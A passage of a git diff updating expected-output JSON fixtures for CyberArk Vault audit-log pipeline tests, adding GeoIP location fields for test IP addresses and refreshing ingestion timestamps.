Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"CPMDisabled\",\"Value\":\"(CPM)MaxRetries\"},{\"Name\":\"RetriesCount\",\"Value\":\"5\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813031\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -774,6 +837,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -854,7 +926,7 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-12-09T13:37:08.403105900Z", + "ingested": "2021-12-14T14:42:37.331273717Z", "original": "\u003c7\u003e1 2021-03-15T13:04:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:04:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:04:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813465\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:04:27\",\"IsoTimestamp\":\"2021-03-15T13:04:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813465\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -883,6 +955,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -966,7 +1047,7 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-12-09T13:37:08.403111200Z", + "ingested": "2021-12-14T14:42:37.331274102Z", "original": "\u003c7\u003e1 2021-03-15T14:44:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:44:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:44:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:44:37\",\"IsoTimestamp\":\"2021-03-15T14:44:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=1;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "60", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json index f9982edaafc..ce1d719a7e1 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json @@ -7,6 +7,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -52,7 +61,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726762400Z", + "ingested": "2021-12-14T14:42:38.882230862Z", "original": "\u003c5\u003e1 2021-03-10T09:11:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:54\",\"IsoTimestamp\":\"2021-03-10T09:11:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_localhost.localdomain.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" @@ -65,6 +74,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -110,7 +128,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726766Z", + "ingested": "2021-12-14T14:42:38.882233938Z", "original": "\u003c5\u003e1 2021-03-10T17:58:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:05\",\"IsoTimestamp\":\"2021-03-10T17:58:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMNotifications\",\"File\":\"Root\\\\SessionControl\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" @@ -123,6 +141,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -168,7 +195,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726770700Z", + "ingested": "2021-12-14T14:42:38.882234373Z", "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" @@ -181,6 +208,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -226,7 +262,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726776900Z", + "ingested": "2021-12-14T14:42:38.882234762Z", "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" @@ -285,7 +321,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726781900Z", + "ingested": "2021-12-14T14:42:38.882235191Z", "original": "\u003c5\u003e1 2021-03-11T16:50:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:50:29\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:50:29Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:50:29\",\"IsoTimestamp\":\"2021-03-11T16:50:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"Root\\\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" @@ -298,6 +334,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -344,7 +389,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726787Z", + "ingested": "2021-12-14T14:42:38.882235576Z", "original": "\u003c5\u003e1 2021-03-11T16:59:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:58\",\"IsoTimestamp\":\"2021-03-11T16:59:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" @@ -411,7 +456,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726791100Z", + "ingested": "2021-12-14T14:42:38.882235975Z", "original": "\u003c5\u003e1 2021-03-14T12:07:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:07:32\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:07:32Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eAccountsFeedDiscoveryLogs\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:07:32\",\"IsoTimestamp\":\"2021-03-14T12:07:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"AccountsFeedDiscoveryLogs\",\"File\":\"Root\\\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "62", "kind": "event" @@ -424,6 +469,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -470,7 +524,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726796100Z", + "ingested": "2021-12-14T14:42:38.882236365Z", "original": "\u003c5\u003e1 2021-03-14T12:57:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n 